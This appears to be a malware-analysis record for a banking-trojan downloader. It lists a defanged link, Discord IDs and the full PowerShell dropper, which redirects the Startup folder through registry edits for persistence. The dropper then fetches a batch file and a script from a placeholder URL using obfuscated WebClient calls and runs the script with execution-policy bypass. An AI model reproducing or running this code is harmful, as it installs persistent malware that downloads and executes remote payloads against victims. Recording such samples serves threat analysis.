Links:
- hxxps://ia801400.us.archive.org/0/items/bat02/bat02.txt
Identificators: Bank Trojan, File Downloader, Hashing
Discord Info: Server IDl 821807081475932183, Channel ID: 829546268577366056
Structure:
[system.io.directory]::CreateDirectory("C:\Users\Public\Run")
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\Users\Public\Run";
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\Users\Public\Run";
start-sleep -s 5
Function HBankers
{
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('MALWARE_URL','C:\Users\Public\Run\Run.bat')){
}
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('MALWARE_URL', 'C:\Users\Public\ Microsoft.ps1')){
}
start-sleep -s 7
powershell -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
}
IEX HBankers